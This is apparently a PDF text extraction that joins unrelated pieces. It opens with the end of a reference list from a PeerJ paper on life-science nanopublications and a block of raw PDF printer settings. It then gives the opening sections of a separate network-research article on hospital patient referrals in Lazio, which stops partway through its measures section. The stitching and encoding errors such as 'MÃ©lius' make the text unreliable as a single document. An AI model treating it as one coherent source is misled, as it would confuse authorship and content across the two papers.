http://dx.doi.org/10.1109/TKDE.2012.228 http://dx.doi.org/10.1109/ACCESS.2020.2966823 http://dx.doi.org/10.3233/ISU-2010-0613 http://dx.doi.org/10.1145/2523817 http://dx.doi.org/10.7717/peerj-cs.335 https://peerj.com/computer-science/ Kuhn T, Willighagen E, Evelo C, Queralt-Rosinach N, Centeno E, Furlong LI. 2017. Reliable granular references to changing linked data. In: d’Amato C, Fernandez M, Tamma V, Lecue F, Cudré-Mauroux P, Sequeda J, Lange C, Heflin J, eds. The Semantic Web—ISWC 2017. Cham: Springer International Publishing, 436–451. Lopez-Veyna JI, Sosa VJS, López-Arévalo I. 2012. A virtual document approach for keyword search in databases. In: DATA. Setúbal: SciTePress, 39–48. Luo Y, Wang W, Lin X, Zhou X, Wang J, Li K. 2011. SPARK2: top-k keyword query in relational databases. IEEE Transactions on Knowledge and Data Engineering 23(12):1763–1780 DOI 10.1109/TKDE.2011.60. Mass Y, Sagiv Y. 2016. Virtual documents and answer priors in keyword search over data graphs. In: Proceeding of the Workshops of the EDBT/ICDT, 2016 Joint Conference, volume 1558 of CEUR Workshop Proceedings. McCusker JP, Dumontier M, Yan R, He S, Dordick JS, McGuinness DL. 2017. Finding melanoma drugs through a probabilistic knowledge graph. PeerJ Computer Science 3(1):e106 DOI 10.7717/peerj-cs.106. McCusker J, Rashid SM, Agu N, Bennett KP, McGuinness DL. 2018. The whyis knowledge graph framework in action. In: Proceeding of the ISWC 2018 Posters & Demonstrations, Industry and Blue Sky Ideas Tracks co-located with 17th International Semantic Web Conference (ISWC 2018), volume 2180 of CEUR Workshop Proceedings. Mons B, Van Haagen H, Chichester C, Hoen P-B, Den Dunnen JT, Van Ommen G, Van Mulligen E, Singh B, Hooft R, Roos M, Hammond J, Kiesel B, Giardine B, Velterop J, Groth P, Schultes E. 2011. The value of data. Nature Genetics 43(4):281–283 DOI 10.1038/ng0411-281. Page R. 2018. Liberating links between datasets using lightweight data publishing: an example using plant names and the taxonomic literature. Biodiversity Data Journal 6:e27539 DOI 10.3897/BDJ.6.e27539. Piñero J, Ramírez-Anguita JM, Saüch-Pitarch J, Ronzano F, Centeno E, Sanz F, Furlong LI. 2019. The DisGeNET knowledge platform for disease genomics: 2019 update. Nucleic Acids Research 48(D1):D845–D855. Pontén F, Jirström K, Uhlen M. 2008. The human protein atlas’a tool for pathology. Journal of Pathology 216(4):387–393 DOI 10.1002/path.2440. Pound J, Mika P, Zaragoza H. 2010. Ad-hoc object retrieval in the web of data. In: Proceeding of the 19th International Conference on World Wide Web, WWW 2010. New York: ACM Press, 771–780. Pérez J, Arenas M, Gutierrez C. 2009. Semantics and complexity of SPARQL. ACM Transactions on Database Systems 34(3):1–45. Queralt-Rosinach N, Kuhn T, Chichester C, Dumontier M, Sanz F, Furlong LI. 2016. Publishing DisGeNET as nanopublications. Semantic Web 7(5):519–528 DOI 10.3233/SW-150189. Rahman P, Jiang L, Nandi A. 2020. Evaluating interactive data systems. VLDB Journal 29(1):119– 146 DOI 10.1007/s00778-019-00589-2. Robertson SE, Walker S, Jones S, Hancock-Beaulieu MM, Gatford M. 1994. Okapi at TREC-3. In: Harman DK, ed. Overview of the Third Text REtrieval Conference (TREC-3). Washington, D. C.: National Institute of Standards and Technology, 109–126. Silvello G. 2018. Theory and practice of data citation. Journal of the American Society for Information Science and Technology 69(1):6–20. Simitsis A, Koutrika G, Ioannidis YE. 2008. Précis: from unstructured keywords as queries to structured databases as answers. VLDB Journal 17(1):117–149 DOI 10.1007/s00778-007-0075-9. Giachelle et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.335 34/35 http://dx.doi.org/10.1109/TKDE.2011.60 http://dx.doi.org/10.7717/peerj-cs.106 http://dx.doi.org/10.1038/ng0411-281 http://dx.doi.org/10.3897/BDJ.6.e27539 http://dx.doi.org/10.1002/path.2440 http://dx.doi.org/10.3233/SW-150189 http://dx.doi.org/10.1007/s00778-019-00589-2 http://dx.doi.org/10.1007/s00778-007-0075-9 http://dx.doi.org/10.7717/peerj-cs.335 https://peerj.com/computer-science/ Slenter DN, Kutmon M, Hanspers K, Riutta A, Windsor J, Nunes N, MÃ©lius J, Cirillo E, Coort SL, Digles D, Ehrhart F, Giesbertz P, Kalafati M, Martens M, Miller R, Nishida K, Rieswijk L, Waagmeester A, Eijssen LMT, Evelo CT, Pico AR, Willighagen EL. 2017. WikiPathways: a multifaceted pathway database bridging metabolomics to other omics research. Nucleic Acids Research 46(D1):D661–D667 DOI 10.1093/nar/gkx1064. The Economist. 2017. The world’s most valuable resource is no longer oil, but data. Available at https://www.economist.com/leaders/2017/05/06/the-worlds-most-valuable-resource-is-no-longer- oil-but-data. Uhlen M, Zhang C, Lee S, Sjöstedt E, Fagerberg L, Bidkhori G, Benfeitas R, Arif M, Liu Z, Edfors F, Sanli K, Von Feilitzen K, Oksvold P, Lundberg E, Hober S, Nilsson P, Mattsson J, Schwenk JM, Brunnström H, Glimelius B, Sjöblom T, Edqvist P-H, Djureinovic D, Micke P, Lindskog C, Mardinoglu A, Ponten F. 2017. A pathology atlas of the human cancer transcriptome. Science 357(6352):eaan2507 DOI 10.1126/science.aan2507. Waagmeester A, Kutmon M, Riutta A, Miller R, Willighagen EL, Evelo CT, Pico AR. 2016. Using the semantic web for rapid integration of wikiPathways with other biological online data resources. PLOS Computational Biology 12(6):1–11 DOI 10.1371/journal.pcbi.1004989. Wang H, Aggarwal CC. 2010. A survey of algorithms for keyword search on graph data. In: Managing and Mining Graph Data. Berlin: Springer, 249–273. Wu W. 2013. Proactive natural language search engine: tapping into structured data on the web. In: Proceeding of the Joint 2013 EDBT/ICDT Conferences. New York: ACM Press, 143–148. Wynholds LA, Wallis JC, Borgman CL, Sands A, Traweek S. 2012. Data, data use, and scientific inquiry: two case studies of data practices. In: Proceeding 12th ACM/IEEE-CS Joint Conference on Digital Libraries (JCDL 2012). New York: ACM Press, 19–22. Yu JX, Qin L, Chang L. 2010. Keyword search in relational databases: a survey. IEEE Data Engineering Bulletin 33(1):67–78. Zhang H, He X, Harrison T, Bian J. 2019. Aero: an evidence-based semantic web knowledge base of cancer behavioral risk factors. In: Proceeding of the 4th International Workshop on Semantics- Powered Data Mining and Analytics co-located with the 18th International Semantic Web Conference (ISWC 2019), volume 2427 of CEUR Workshop Proceedings. 7–11. Giachelle et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.335 35/35 http://dx.doi.org/10.1093/nar/gkx1064 https://www.economist.com/leaders/2017/05/06/the-worlds-most-valuable-resource-is-no-longer-oil-but-data https://www.economist.com/leaders/2017/05/06/the-worlds-most-valuable-resource-is-no-longer-oil-but-data http://dx.doi.org/10.1126/science.aan2507 http://dx.doi.org/10.1371/journal.pcbi.1004989 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.335 Search, access, and explore life science nanopublications on the Web Introduction Background The nanoweb architecture Nanopublication collection statistics Nanoweb graphical user interface Discussion on maintaining aspects Conclusions flink8 References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS /CHT /DAN /DEU /ESP /FRA /ITA /JPN /KOR /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR /PTB /SUO /SVE /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_4tk7vbc46ndwrkklwbvejl4sim ---- 31© 2020 Authors. This work is licensed under the Creative Commons Attribution 4.0 License (https://creativecommons.org/licenses/by/4.0/). CONNECTIONS Issue 1 | Vol. 40Article | DOI: 10.21307/connections-2019.011 Clients’ outcomes from providers’ networks: the role of relational exclusivity and complementary capabilities Denis Trapido,1,* Francesca Pallotti2 and Alessandro Lomi3 1University of Washington Bothell, Bothell, Washington. 2University of Greenwich, London, UK. 3University of Italian Switzerland, Switzerland and University of Exeter, England, UK. *E-mail: dtrapido@uw.edu This article was accepted by Prof David Schaefer, Action Editor. Abstract Organizations have leeway in how much they employ their network relations to the benefit of their clients. When do they do so more rather than less? Relying on research on trust and knowledge absorption, the authors suggest that providers’ network relations generate better outcomes for their clients when these relations are concentrated in a limited, exclusive set of partners. The authors argue that providers’ relational exclusivity benefits clients because it facilitates the awareness and use of partners’ complementary client service capabilities. An analysis of a regional network of patient referrals among 110 hospitals supported this argument. The study highlights the role of interorganizational partnership networks in activating client service capabilities and stimulates further inquiry into providers’ network features that benefit the users of their services. Keywords Interorganizational networks, Client benefits, Health care. The implications of interorganizational collaboration networks for the benefit of the users of organizations’ offerings − variously called consumers, clients, cus- tomers or patrons − are puzzlingly variable. Clients may enjoy substantial quality and price benefits from providers’ collaboration networks (Brueckner and Whalen, 2000; Morrish and Hamilton, 2002)1. Yet network ties among providers may also disadvantage their clients by limiting the clients’ ability to choose between independent providers or to judge the quality of the offerings (Baker and Faulkner, 1993; Ingram and Roberts, 2000). Neutral scenarios, when providers’ networks do not affect the benefits of the users of their services, are also possible. Why such different outcomes? What determines the extent to which providers’ network relations benefit their clients? Organizational networks research has given this question remarkably short shrift. Studies have examined the benefits of provider networks for buyer firms (Uzzi, 1997; Uzzi and Gillespie, 2002; Uzzi and Lancaster, 2003), but not for individual end customers. Studies in other disciplines that touched upon the question have generally converged on the importance of providers’ motivation to benefit their clients. Some studies implied that providers may jointly benefit clients when they are intrinsically motivated to collaborate in the clients’ interest (Bunderson and Thompson, 2009; Leana et al., 2009; Wrzesniewski et al., 1997). Others noted a similar motivating effect of external pressures to collaborate on improving service recipients’ outcomes, including institutional pressures by professional associations or accreditations agencies (Durand and McGuire, 2005; Ruef and Scott, 1998) and competitive pressures forcing providers into alliances whose efficiency benefits spill over to their clients (Brueckner and Whalen, 2000; Morrish and Hamilton, 2002). 1Going forward, we use the term “provider” to denote any organization that provides goods or services. Because we develop and test an argument that specifically applies to providers and users of professional services, we will refer to users of providers’ offerings as “clients” or “service recipients.” We will use more general terms, such as “customer” or “consumer,” when they feature in arguments that we reference. 32 Clients’ outcomes from providers’ networks While the role of providers’ motivation is undeniable, motivation cannot fully account for clients’ benefits from providers’ network relations. Even highly motivated providers can put their networks in the service of their clients only to the extent that their network relations improve their capability to serve clients (Wuyts et al., 2015). A full account of service users’ benefits from providers’ networks is not possible without understanding when and how providers’ networks unlock this capability. Our study takes an early step toward such understanding. We build on the fundamental insight of organizational network theory that organizational outcomes depend on features of interorganizational partnership networks (Borgatti and Halgin, 2011; Powell et al., 1999; Uzzi 1996, 1997). We extend the notion that features of these networks enable organizational outcomes, arguing that network features may also enable client outcomes. Building on theories of trust and knowledge absorption, we argue that relational exclusivity is a feature of providers’ ego networks that improves their capability to benefit clients: providers’ partnerships produce better outcomes for their clients when they connect to their partnership network through selected, exclusive relations. We further argue that relational exclusivity benefits clients by helping providers combine client service capabilities; its effect is, therefore, more pronounced to the extent that the partners’ client service capabilities are complementary. We examine our argument in a regional patient referral network comprising 110 hospitals in Italy. We follow the lead of previous studies that used data from health care to test theoretical arguments generalizable across industries (Barrera and van de Bunt, 2009; Drange, 2013) and patient outcome data in particular to operationalize client benefit (e.g. DiBenigno and Kellogg, 2014; Provan and Milward, 1995; Schoonhoven, 1981). Specifically, we test the effects of referral network features on the benefits that patients derive from being routed toward providers of better care. Our research contributes to organizational network theory by identifying a provider network feature that enables better client outcomes. We transcend the motivational explanations of client outcomes from providers’ network relations, showing that client outcomes depend on the extent to which these relations activate providers’ capability to serve client needs. The study challenges organizational network theory to match the rich literature on interorganizational network features that benefit providers with an equally rich understanding of network features that benefit clients. We also offer practical recommendations to policymakers on improving client outcomes from provider networks. Theory and hypotheses Motivational determinants of client outcomes from provider networks Studies of determinants of client benefits from providers’ network relations are spread across various literatures and have been in minimal dialogue with each other. The common feature of these diverse studies is the emphasis on providers’ motivation. In different ways, they suggested that providers are motivated to use their network relations in the interest of the client insofar as the providers’ rewards are interdependent with their clients’ outcomes. The interdependence of providers’ and customers’ outcomes is most obvious when it is inherent in the nature of the transaction. For example, in the venture capital industry, the investing firms’ collaboration ties simultaneously benefit the investing firms and their investment targets (Hochberg et al., 2007; Ozmel et al., 2020). Similar interdependence may exist due to contractual arrangements, such as contingent fee contracts in legal and financial services, which explicitly make providers’ rewards dependent on clients’ outcomes (Gravelle and Waterson, 1993; Rau, 2000). However, the interests of providers and their customers are usually imperfectly aligned. Then, providers have leeway to disregard the benefit of the customers in their network relations, or even to act against it. In the milder of such scenarios, a fully booked hotel whose management is linked to another hotel by friendship relations may refer potential customers to that partner hotel (Ingram and Roberts, 2000); thus, steering them away from better competing offers. The more drastic scenarios have attracted economists’ attention since the days of Adam Smith, who famously commented that “people of the same trade seldom meet together, even for merriment and diversion, but the conversation ends in a conspiracy against the public, or in some contrivance to raise prices” (Smith, [1776] 1991:116). Modern research examines similar designs by “people of the same trade” under the rubric of organized special interests (Boies, 1989; Grier et al., 1991) or collusion (Rotemberg and Saloner, 1990). When providers’ outcomes are loosely related to clients’ outcomes, two categories of factors may motivate organizations to jointly improve clients’ outcomes. First, organizations may be motivated by external pressures. Most obviously, such pressure may come from antitrust regulators explicitly tasked with 33 CONNECTIONS preventing and punishing collaboration that is harmful to clients. Professional associations or accreditation agencies may also exert external pressure on providers to adopt service standards above and beyond government regulations (Durand and McGuire, 2005; Ruef and Scott, 1998), including standards that regulate providers’ collaboration (Cohen and Hilligoss, 2010; Patterson, 2008). Furthermore, competitive pressure may impel providers to jointly benefit clients, e.g. by forming alliances that improve services and cut prices (Brueckner and Whalen, 2000; Morrish and Hamilton, 2002). Second, providers may be intrinsically motivated to provide good customer experience. Research has highlighted a secular sense of calling − that is, con- struing work as a fulfilling, socially useful activity − and shown the role of calling in sustaining the quality of ser- vice (Bunderson and Thompson, 2009; Wrzesniewski et al., 1997; Wuyts et al., 2015). Individuals or organi- zations driven by a sense of calling may collaboratively craft work routines that lead to better service quality (Leana et al., 2009). Enabling network features No matter how motivated providers are to put their network ties in the service of clients, they can only do so if their own and their network partners’ capabilities can be joined in ways that produce better client service (Wuyts et al., 2015). Without denying the importance of motivational factors, we therefore shift the focus to the role of network features that unlock providers’ capabilities to jointly benefit clients. We extend the basic insight of network theory that individuals’ and organizations’ outcomes depend on features of the networks in which they are embedded (Granovetter, 1985; Borgatti and Halgin, 2011), positing that network features may also shape the outcomes that organizations produce for their clients. Network features enabling organizational outcomes An extensive, vibrant literature has documented features of organizations’ ego networks that enable beneficial organizational outcomes. For example, a balanced mix of strong and weak ties in a firm’s network has been shown to improve its survival chances (Uzzi, 1996). There is evidence that firms that are well-connected (central) in their industry’s overall network attain better performance (Powell et al., 1999; Tan et al., 2015), and so do firms whose network partners are diverse (Baum et al., 2000). Studies found that organizations’ innovation performance is better when their networks bridge between industry peers (Soda, 2011) and when they have fewer ties connecting them to competitors through intermediaries (Pahnke et al., 2015). Networks that connect organizations to disconnected, non- redundant partners have been shown to be advan- tageous to organizations’ performance in uncertain, entrepreneurial environments, while networks that connect to highly interconnected partners are advan- tageous in stable environments (Baum et al., 2014; Rowley et al., 2000). Relational exclusivity as an enabler of client outcomes Service providers routinely shape the outcomes not only for themselves but also for their clients. Given the amply evidenced potential of beneficially structured networks to create economic value for providers, we suggest that features of providers’ networks have a comparable potential to shape the benefits of their clients. Rather than attempt to develop an exhaustive theory of providers’ ego network features that are favorable to client outcomes, our study takes an early step toward such theory by identifying one favorable feature, relational exclusivity. Providers’ network relations are exclusive to the extent that they are concentrated to few select partners rather than evenly spread across available partners (see Figure 1 for illustration). We argue that providers linked to the network through exclusive relations − sometimes synonymously referred to as embedded relations (Uzzi, 1996; Shipilov, 2005) − better cater to client needs because such relations facilitate providers’ awareness and use of the partners’ client service capabilities2. Theory suggests two reasons why relational exclusivity helps develop awareness of partners’ capabilities to serve clients. First, exclusive commit- ment to a limited set of network partners generates, and is generated by, mutual trust (Granovetter, 1985; Gulati, 1995; Zaheer and Venkatraman, 1995). Partners who develop trust are more willing to mutually disclose information without fearing harmful consequences (Levin and Cross, 2004; Lui and Ngo, 2004; Mayer et al., 1995). Openness about an organization’s shortcomings in client service is particularly helpful in 2Despite the affinity between relational exclusivity and Granovetter’s (1985) notion of embeddedness, we avoid treating the two concepts as equivalent because alterna- tive operationalizations of embeddedness have been sug- gested (e.g. Moody and White, 2003). 34 Clients’ outcomes from providers’ networks informing its partners how they can assist its clients. For example, firms more fully disclose their products’ typical problems to external customer support partners who they have trusted relational ties to; awareness of the problems in turn helps such partners provide good customer support (Wuyts et al., 2015). Similarly, clinical history paperwork that accompanies patients referred between hospitals may reveal shortcomings in the referring hospital’s treatment (with potential reputational and legal repercussions) − but the shortcomings also suggest what the receiving hospital can do for the patient that the sending hospital could not (Iwashyna and Courey, 2011; Lomi and Pallotti, 2012). Thus, by enabling trust-based disclosure, relational exclusivity better positions providers to combine their capabilities in ways that benefit clients. Second, exclusive relations help partners over- come obstacles to knowledge absorption. A substan- tial share of knowledge that collaborators need to complete joint tasks is tacit, complex or both. The absorption of tacit or complex knowledge depends on assistance that its source offers. Because partners in embedded, exclusive relations have more willingness and shared time to assist each other in absorbing knowledge, and to ask for assistance, such relations have proved instrumental for tacit and complex organizational learning (Szulanski, 1996; Uzzi, 1997). The notion that exclusive relations help convey and retain tacit knowledge has been invoked to explain the very existence of organizations (Kogut and Zander, 1992). Insofar as the use of exclusive relations to link to the network facilitates the absorption of knowledge that may benefit organizations, we expect it to have the same effect on knowledge that helps them jointly benefit their clients. The relationship between providers’ relational exclusivity and the benefits of their service recipients may be summarized as follows: H1. A provider generates more benefit to service recipients through its partnership ties to the extent that the provider concentrates relations to few partners rather than spreads them out among many partners. Complementary client service capabilities Our argument is premised on the logic of comple- mentary capabilities. We argued that relational exclusivity unlocks the potential of partnering orga- nizations to benefit clients because it improves their knowledge and use of network partners’ complementary client service capabilities. This logic implies that the hypothesized effect of relational exclusivity varies with the extent to which the focal providers’ and its partners’ capabilities can be combined to benefit clients. If providers have few complementary capabilities, their networks can produce little benefit to their clients, no matter how they might be structured. Conversely, if the partners’ complementarity is high, beneficially structured networks will help them direct their clients toward partners’ capabilities that they lack. To probe the supporting logic of our first hypothesis, we examined the following additional hypothesis: H2. The positive effect of relational exclusivity on client benefit is stronger to the extent that the providers’ and its partners’ client service capabilities are complementary. The empirical setting We test our hypotheses using data that we collected on patient referral relations in a network of hospital Figure 1: High and low relational exclusivity. Note: Relational exclusivity is an attribute of the black node. Line thickness is proportional to relation intensity. High Relational Exclusivity Low Relational Exclusivity 35 CONNECTIONS organizations. Our choice of health care as the empirical setting is consistent with our focus on capability-related causal mechanisms. Because of the ethical and legal norms that mandate concern for patient well-being, motivational determinants of the quality of client service in health care may vary little and be poorly generalizable to other contexts. In contrast, health care providers’ use of partners’ complementary capabilities to benefit a patient is not mandated; it is subject to the effects of providers’ network features, as it is in other types of services. The health care system in Lazio Lazio is the large Italian region with the center in Rome and a population of almost 5.9 million. The health care system in Lazio is part of Italy’s National Health Service (INHS), a publicly funded health care system providing universal insurance coverage to all citizens and legal residents. During the four-year period covered by our data, the system had 110 facilities in Lazio, 59 of which were publicly owned hospitals. The remaining 51 were accredited private hospitals and contracting ambulatory care organizations. All 110 facilities, regardless of the ownership form, accepted universal health insurance. The system underwent reforms in the 1990s, aimed at improving overall performance. Among other changes, the reforms introduced a diagnosis- based system of reimbursement of hospital services, established financial performance criteria and made hospital CEOs responsible for meeting them, gave patients more freedom to choose health care providers, and made funding more directly dependent on the amount and quality of provided services. The reforms created a quasi-market designed to sustain the equity benefits of traditional public healthcare systems while also reaping the potential efficiency gains from competition (Barretta, 2008). In this hybrid arrangement, accredited hospitals compete for patients and INHS budget allocations but may also cooperate in the interest of public health (Lomi and Pallotti, 2012). Inter-hospital patient referral Inter-hospital referral of patients is a common collaborative activity for health care institutions (Iwashyna and Courey, 2011; Lomi and Pallotti, 2012). We focus on the referral of inpatients under nonemergency conditions. Engaging in such referral is voluntary for hospitals − they have the discretion to make, accept and refuse referral requests. There are no regulations prescribing the choice of collaboration partners or requiring that hospitals give reasons for acceptance or refusal. Nor may a hospital be forced to refer a patient simply because it lacks beds or admits no patients with particular symptoms or condition − by definition, inpatient referral may only happen if the patient was previously admitted to the sending hospital. As hospitals face few external pressures in nonemergency referral decisions, the referral destinations are determined, alongside care quality, by informal, hospital-specific norms and routines (Bosk et al., 2011; Veinot et al., 2012). Patient referral networks are uniquely suited to our empirical purposes for at least four reasons. First and foremost, patient referral data can detect the particular benefits that accrue to care recipients from relations between providers, rather than risk confounding these benefits with those that come from other sources. When a patient is referred to a hospital delivering services of higher quality, we know that the improvement in service quality that she experiences is due to a particular instance of interorganizational collaboration. In contrast, in most other instances where clients may benefit or suffer from interorganizational relations, no quantitative method can reliably link a client’s outcome to any particular relation. This link can only be established in in-depth case study (Provan and Milward, 1995) or indirectly inferred from correlation between network variables and client outcomes (Hochberg et al., 2007). Second, our statistical inference is immune to selection biases resulting from service recipients’ actions because patients surrender control at admission over interhospital referrals. Patients cannot choose where they will be referred; like any other treatment decision, referral remains a prerogative of the hospital in charge of the patient. Third, the exclusivity of patient referral relations exhibits wide and meaningful variation, necessary for the test of H1. Some hospitals’ patient referrals are episodic acts, negotiated and coordinated ad hoc for each specific instance. In other cases, patient referral is a manifestation of an underlying rich and lasting, exclusive interorganizational partnership. Such partnerships involve well-developed knowledge exchange routines, trust and joint decision making (Bosk et al., 2011; Gittell and Weiss, 2004). They predate and transcend specific instances of referral. Finally, the particular methodological advantage of the inpatient referral network in Lazio is that it is largely contained within the region. In the period that we studied, only between 6 and 8 percent of Lazio’s inpatient referrals crossed the region’s boundary (Marrocu et al., 2016, p. 24). Network boundary specification, an endemic problem in network studies, is thus not a major concern in our data. 36 Clients’ outcomes from providers’ networks Data Our quantitative data come from the Regional Hospital Information System database maintained by the Public Health Agency of Lazio. The database holds information on attributes of the 110 hospitals in the region accredited by the INHS and on referral patient flows between them, recorded annually from 2006 through 2009. We used data on all of these hospitals except two that referred no patients. The data set records a referral only if the receiving hospital admitted the referred patient. To improve our contextual understanding of patient referral in Lazio, we conducted 17 semi-structured interviews with region’s physicians and hospital administrators. Measures Data structure and model Our data set has a four-wave panel structure: the variables are measured yearly at the level of the hospital. Standard errors may be biased when regression models are estimated with panel data sets because the residuals are subject to correlation across repeated observations within organizations and within periods. To preclude such bias, the standard errors in the linear regression models reported below were corrected for hospital-level and year-level clustering (Cameron et al., 2012; Thompson, 2011). The correction algorithm calculates standard errors in three cluster- robust covariance matrices: one with clustering by the first variable (hospital), one with clustering by the second variable (year), and one with clustering by their intersection. The standard errors are then estimated with the matrix computed by summing the first two matrices and subtracting the third (Cameron et al., 2012). Unlike in fixed and random effects models, standard errors corrected for clustering by two variables are unbiased even when the effect of one clustering variable varies across levels of the other (Petersen, 2009)3. Dependent variable: patient benefit Patients benefit from interhospital referral networks to the extent that the receiving hospitals provide higher quality care than the sending hospitals (Bosk et al., 2011; Iwashyna et al., 2009; Lomi et al., 2014). The risk-standardized readmission rate (RSRR) is a common measure of the quality of hospital care (Axon and Williams, 2011; Horwitz et al., 2012; Landrum and Weinrich, 2006). When patients are frequently readmitted to a hospital, this attests that the hospital fails to cure the conditions that its patients need treatment for; conversely, if the readmission rate is low, the hospital routinely succeeds in curing its patients. The INHS officially defines hospital readmission as admission of the patient into the hospital from which that patient was discharged within previous 30 days for the same condition. To make this raw readmission rate comparable across hospitals, it is standardized by the types of medical procedures offered by the hospital and the complexity of cases treated. Cases of planned readmission (such as chemotherapy, HIV and kidney dialysis) are excluded from the calculation of the RSRR. RSRR is routinely used by the INHS, Medicare, Medicaid and the Hospital Quality Alliance to measure patient outcomes in a way that is comparable across hospitals with different specialization profiles (Centers for Medicare and Medicaid Services, 2016). Unlike the mortality rate, the other common measure of care quality, RSRR is applicable to non-life-threatening conditions. RSRR has passed construct validity tests that compared it to hospital rankings and patient satisfaction (Boulding et al., 2011; Halfon et al., 2006; Horwitz et al., 2012). It also responds to interventions aiming to improve care quality (Coleman et al., 2006). Despite its advantages and wide use, RSRR is not a perfect metric. It is a coarser measure of care quality than other possible readmission measures unavailable to us, such as department-level readmission rates. Also, the precise definition of unplanned readmission and the methods of cross-hospital standardization are a matter of debate in medical research (Axon and Williams, 2011). We embrace RSRR in awareness of these imperfections. Following Lomi et al. (2014), we conceptualize patient benefit from a single instance of referral as the difference between the quality of care in the hospital that receives and in the hospital that sends the patient. Because lower readmission rates correspond to better quality, we subtract the RSRR in the sending hospital from that in the receiving hospital. Our dependent variable brings this patient benefit measure to the level of the hospital by summing these differences over all the hospital’s referrals made or received in the year. The higher the sum is, the greater is the total patient benefit from the hospital’s patient referral relations. 3This correction may be used with any pair of variables that make observations non-independent and with a variety of regression models. The stata code that implements correc- tion for clustering on two variables in linear, probit, logit and tobit models is available at www.kellogg.northwestern.edu/ faculty/petersen/htm/papers/se/se_programming.htm. 37 